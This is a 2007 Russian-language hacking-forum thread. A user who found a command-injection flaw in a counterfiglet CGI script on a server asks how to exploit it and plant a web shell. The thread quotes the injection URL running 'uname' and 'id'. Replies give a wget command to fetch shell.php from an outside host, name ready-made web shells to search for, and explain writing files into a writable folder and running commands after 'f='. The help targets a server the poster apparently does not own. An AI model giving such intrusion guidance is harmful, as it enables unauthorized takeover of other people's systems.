HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Дыра cgi-bin/counterfiglet....
  #1  
Старый 08.02.2007, 00:14
vipklient
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами: 10134522

Репутация: 0
Question Дыра cgi-bin/counterfiglet....

Нашёл дыру на одном сервере вот такого типа: cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id...
Прочитал об этой дыре много... С её помошью можно залить на сервак Shell... Проблема в том что сам Shell найти немогу. Нашёл когдато здесь на форуме PHP сплойт под эту дыру, а скомпилить неполучается... Да даже дело не в скомпилить, просто я её поошибке затёр. И сейчас немогу найти его.Помоему инекция конкретно работает с этой дырой. Вообщем: Помогите мне воспользоватся этой дырой, своими советами и подсказками. Shell бы тоже непомишал. Или на худой конец помогите найти здесь на форуме Php сплойт для данной дыры.

Последний раз редактировалось vipklient; 08.02.2007 в 00:16..
 
Ответить с цитированием

  #2  
Старый 08.02.2007, 00:34
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

ты команды можешь исполнять что еще тебе надо?
 
Ответить с цитированием

  #3  
Старый 08.02.2007, 00:56
vipklient
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами: 10134522

Репутация: 0
По умолчанию

Цитата:
Сообщение от [ cash ]  
ты команды можешь исполнять что еще тебе надо?
А поподобнее можно...
 
Ответить с цитированием

  #4  
Старый 08.02.2007, 00:48
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

wget yoursite.com/shell.php
а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате
 
Ответить с цитированием

  #5  
Старый 08.02.2007, 01:06
vipklient
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами: 10134522

Репутация: 0
Question

Цитата:
Сообщение от n0ne  
wget yoursite.com/shell.php
а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате
Напиши плз. как правелно залить r57shell.
 
Ответить с цитированием

  #6  
Старый 08.02.2007, 01:11
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

Для начало тебе нужна папка с правами на запись.
Если разрешенно записывать в папку с самим cgi скриптом то туда надо закинуть cgi shell.
Вообще определись что тебе попробуй команды типо echо 123>123.php а вообще можно полноценно лазить как через шелл... просто исполняя команды так...
2n0ne
Гениально
 
Ответить с цитированием

  #7  
Старый 08.02.2007, 01:25
vipklient
Новичок
Регистрация: 07.02.2007
Сообщений: 8
С нами: 10134522

Репутация: 0
По умолчанию

А если без шелла. Как найти команды которые он будет воспринимать?
 
Ответить с цитированием

  #8  
Старый 08.02.2007, 01:31
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

все команды nix систем..
Если там nix...
 
Ответить с цитированием

  #9  
Старый 08.02.2007, 01:36
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
С нами: 10408706

Репутация: 4451


По умолчанию

Ради интереса вбил в поисковик counterfiglet нашел вот это http://herurg.chat.ru/counterfiglet.txt . Внимания заслуживает дата 1995
 
Ответить с цитированием

  #10  
Старый 08.02.2007, 18:08
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

[ cash ], уху)) я такой

Автор, после "f=" пишешь команду)
попробуй "ls -la" без кавычек, ответ есть?
и если, как ты написал, тебе сервер не отвечает, с чего ты взял что ты можешь там что-то исполнять?))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новая дыра в Windows может оказаться опаснее, чем считалось ранее system_32 Мировые новости. Обсуждения. 2 22.09.2006 18:16
В Microsoft Outlook Express найдена опасная дыра DRON-ANARCHY Мировые новости. Обсуждения. 3 16.06.2005 23:02
cgi скрипты на .h12.ru Майор С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 7 16.02.2005 19:16
Дыра в phpbb привела к массовым взломам сайтов ФРАЙ Мировые новости. Обсуждения. 7 19.12.2004 08:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...